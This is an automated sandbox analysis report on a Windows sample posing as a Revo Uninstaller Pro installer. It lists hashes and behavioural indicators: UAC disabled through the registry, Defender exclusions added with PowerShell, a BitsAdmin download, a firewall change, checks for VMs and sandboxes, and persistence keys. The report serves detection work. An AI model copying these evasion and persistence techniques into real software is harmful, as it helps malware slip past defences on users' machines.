Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23/10/2024, 19:26
Static task
static1
Behavioral task
behavioral1
Sample
7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe
-
Size
18.6MB
-
MD5
7076117f0c6d84ffd59192a4b1e7208f
-
SHA1
08b793fc796ea5ef45f5a0d3ca989d2a2852a279
-
SHA256
621d9de231168a4edd7b0d2bfb27f24165a1996c7a540e51fa31317a506a6518
-
SHA512
b4f30483d16a6a38afedb91bba320e051be8a0ea94ed0e23c33f4fe0828d0ff08d8a0663aea6b2c5945b9649605217722037d2d214c3167d99fc90310160ff9a
-
SSDEEP
393216:bsPcjinkzVPjpLnWsDkCSDCe0nz5QVIGKXTpchSpMtm9LZ0+ecQwX:bgFn0DLnC0zuuGKjpch4++em
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions afcdpsrv.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1512 powershell.exe 1988 powershell.exe 2816 powershell.exe 1580 powershell.exe 2076 powershell.exe 1968 powershell.exe 1980 powershell.exe 1620 powershell.exe 2072 powershell.exe 2356 powershell.exe 2160 powershell.exe 2472 powershell.exe 1680 powershell.exe 1936 powershell.exe 1596 powershell.exe 2768 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2880 bitsadmin.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\DRIVERS\SET4569.tmp rundll32.exe File created C:\Windows\system32\DRIVERS\SET4569.tmp rundll32.exe File opened for modification C:\Windows\system32\DRIVERS\revoflt.sys rundll32.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools afcdpsrv.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2308 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion afcdpsrv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion afcdpsrv.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\International\Geo\Nation ruplp.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 16 IoCs
pid Process 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 3068 Revo Uninstaller Pro 4.2.3.exe 2636 Revo Uninstaller Pro 4.2.3.tmp 1532 ruplp.exe 2220 RevoUninPro.exe 1916 RevoUninPro.exe 2008 ruplp.exe 1476 7z.exe 1956 7z.exe 2104 7z.exe 2612 afcdpsrv.exe 2196 afcdpsrv.exe 2152 afcdpsrv.exe 1920 afcdpsrv.exe 608 afcdpsrv.exe 2396 afcdpsrv.exe -
Loads dropped DLL 23 IoCs
pid Process 3052 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 3068 Revo Uninstaller Pro 4.2.3.exe 2636 Revo Uninstaller Pro 4.2.3.tmp 2636 Revo Uninstaller Pro 4.2.3.tmp 2636 Revo Uninstaller Pro 4.2.3.tmp 2636 Revo Uninstaller Pro 4.2.3.tmp 2636 Revo Uninstaller Pro 4.2.3.tmp 2636 Revo Uninstaller Pro 4.2.3.tmp 2636 Revo Uninstaller Pro 4.2.3.tmp 1248 Process not Found 1248 Process not Found 1248 Process not Found 1248 Process not Found 1912 regsvr32.exe 2636 Revo Uninstaller Pro 4.2.3.tmp 1248 Process not Found 380 cmd.exe 1476 7z.exe 1956 7z.exe 2104 7z.exe 380 cmd.exe -
Modifies system executable filetype association 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 raw.githubusercontent.com 4 raw.githubusercontent.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum afcdpsrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 afcdpsrv.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-QH6NB.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-3G84I.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-PL1OO.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7FNCB.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-AFROP.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-QMPH4.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-6TJIK.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P8PVP.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7684I.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HA9R7.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8O5UG.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HO6PG.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DF8AK.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-20KO2.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-LRTN4.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-V9RG7.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JRG9L.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-024VV.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A8FVJ.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-QJFFS.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-20GN9.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-E48OJ.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-I9KT0.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-E7OAL.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-14I97.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-R3A84.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-BE2T7.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A5RAR.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-E34O3.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-O0RKJ.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-TJ59C.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-3CI2V.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-R0971.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-H82AR.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-E6V2E.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-2AP5D.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1S9RN.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-TSBP4.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HQNF0.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-C8EUB.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-9F3S4.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DV4V6.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-B0RCS.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-HIV6E.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-IMF7H.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JNFJJ.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-SI7U6.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-BDBJP.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-37O0A.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-35J7F.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-GQ7L5.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-MA97K.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-LFLFS.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-PKKB7.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-RELD2.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-GO496.tmp Revo Uninstaller Pro 4.2.3.tmp -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\INF\setupapi.app.log rundll32.exe File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe RevoUninPro.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\DisplayIcon.ico RevoUninPro.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruplp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mode.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Revo Uninstaller Pro 4.2.3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruplp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language afcdpsrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Revo Uninstaller Pro 4.2.3.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz runonce.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 runonce.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2880 timeout.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid\ = "{DD72B942-27D2-4A3C-9353-FA0441FBABA0}" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\RevoUninstallerPro.ruel\shell Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4} ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe /implog \"%1\"" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ = "Revo Uninstaller Pro" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\RevoUninstallerPro.ruel\shell\open\command Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\RUShellExt regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open Revo Uninstaller Pro 4.2.3.tmp Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder\Attributes = "48" Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ruel\ = "RevoUninstallerPro.ruel" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0} ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ = "LicProtector Object" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\LocalServer32\ = "C:\\PROGRA~1\\VSREVO~1\\REVOUN~1\\ruplp.exe" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510 ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID\ = "LicProtector.LicProtectorEXE510" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1 ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib ruplp.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL\AppID = "{1D928D64-60D3-4FAC-B810-C4D9D8A680CF}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\ = "RUShellExt Class" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\ = "LicProtector Library" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\FLAGS ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\FLAGS\ = "0" ruplp.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\Software\Classes\.ruel Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\Software\Classes\RevoUninstallerPro.ruel\DefaultIcon Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\ = "LicProtector Object" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RUExt.dll" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\Version = "5.1" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\.ruel Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID ruplp.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\RevoUninstallerPro.ruel\DefaultIcon Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1D928D64-60D3-4FAC-B810-C4D9D8A680CF} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version\ = "5.1" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Set value (str) 